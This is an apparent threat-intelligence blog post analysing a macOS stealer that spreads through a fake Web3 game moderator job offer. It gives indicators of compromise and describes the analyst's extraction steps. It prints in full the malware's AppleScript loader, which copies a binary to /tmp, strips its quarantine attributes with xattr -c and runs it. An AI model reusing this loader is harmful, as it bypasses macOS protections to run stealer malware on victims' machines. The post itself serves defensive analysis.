
🎉 More AppleScript Malware 🎉 via Web3 Game Rune/Rise Online

Why does it always have to be games or meeting software?

A new account shot me a DM on Twitter with some malware, so I figured "why not?". Of course the standard procedure applies:

  1. Do you want a job as an admin / moderator? Pays $500 a week!

  2. Sends a malicious link.

  3. Part of the requirement is creating an account through the software after you download it.

  4. Aaaaand of course it's just straight up malware that steals everything. EZPZ.

Let's jump into it.


Info

URL: https[://]runeonline[.]games

URLScan.io: https://urlscan.io/result/cf8cb6ac-7428-4a21-b182-292e6fcd4a43/

URL VT: https://www.virustotal.com/gui/url/7872392c2d96ce74deef786437a1118e4f2e1780f7988ea7d38c7a47ff6b6c68

Downloaded File Name: RuneLauncher_v.2.5.dmg

Downloaded File Hash: 3f5b9f5940173e9fb46b2eff36c9805dc68652ede49c29a6efafaccc540e2a15

VT (4/62): https://www.virustotal.com/gui/file/3f5b9f5940173e9fb46b2eff36c9805dc68652ede49c29a6efafaccc540e2a15?nocache=1

DMG File 1: RuneLauncher

File 1 Hash: e44228575afdd57630f1ce960d7843ff1052ecea46b9d66ba6d6fdfd83c45511

File 1 VT (6/64): https://www.virustotal.com/gui/file/e44228575afdd57630f1ce960d7843ff1052ecea46b9d66ba6d6fdfd83c45511

DMG File 2: instruction.txt

File 2 Hash: 71421867fcd32ac92545f4a623543cf077838791691a4323347235493aa41767

File 2 VT (0/61): https://www.virustotal.com/gui/file/71421867fcd32ac92545f4a623543cf077838791691a4323347235493aa41767

DMG File 3: An alias to the Terminal application.


First Look

I mounted the "RuneLauncher_v.2.5.dmg" file using:

hdiutil attach RuneLauncher_v.2.5.dmg

and it contained the three files shown above:

  • instruction.txt (Plain Text)

  • RuneLauncher (Unix Executable)

  • Terminal (Alias)

What's inside instruction.txt? Well, I bet you already guessed it: more AppleScript 🎉! And it's not even obfuscated 🙃.

#!/bin/bash
osascript -e 'on run
    try
        set volumeList to list disks
    end try
    set setupVolume to ""
    try
        repeat with vol in volumeList
            if vol contains "RuneLauncher" then
                set setupVolume to vol
                exit repeat
            end if
        end repeat
    end try
    if setupVolume is "" then
        return
    end if
    set scriptDir to "/Volumes/" & setupVolume & "/"
    set executableName to "RuneLauncher"
    set executablePath to scriptDir & executableName
    set tmpExecutablePath to "/tmp/" & executableName
    try
        do shell script "rm -f " & quoted form of tmpExecutablePath
    end try
    try
        do shell script "cp " & quoted form of executablePath & " " & quoted form of tmpExecutablePath
    end try
    try
        do shell script "xattr -c " & quoted form of tmpExecutablePath
    end try
    try
        do shell script "chmod +x " & quoted form of tmpExecutablePath
    end try
    try
        do shell script quoted form of tmpExecutablePath
    end try
end run'

So instead of the AppleScript performing the malicious actions right off the bat, it's used as a loader for RuneLauncher: it finds the mounted volume whose name contains "RuneLauncher", copies the binary to /tmp, strips its extended attributes (which includes the quarantine flag) with xattr -c, marks it executable, and runs it. Neat! What's inside of RuneLauncher? It is (of course) ad-hoc signed.

Running the following command, I extract it to grab the binaries:

7z x RuneLauncher

Running it again, I extract it to separate the interior files:

7z x RuneLauncher~.x64

And now I'm left with this:

At this point, it's time to see how messed up the internals of these files are and whether it'd be easier to approach the sample dynamically or statically. For this, I'm now using a tool called "Hex Fiend" instead of Sublime.

Inside of it is little else other than giant blobs of encoded/encrypted data. It looks like everything may be Base32-encoded on the surface, then potentially some specific strings are used to decrypt it, as just Base32 decoding doesn't give any information up. I ((still)) haven't had time to set up my dynamic analysis environment, which also means I don't have time to walk through this with Binary Ninja and pull values (sadly). But this thing, for sure, is malicious, so stay safe out there! Anything with a Terminal alias inside of it and AppleScript inside a .txt file can't be trusted. 😂

I've updated my Web3/Crypto MacOS malware collection on VirusTotal with it, so feel free to check them out if you're interested in more: https://www.virustotal.com/gui/collection/727abc31926dc18e3fb984679954393c10e9383b1a78fea085254d46bd279cc0/iocs

#malware #macos #web3 #crypto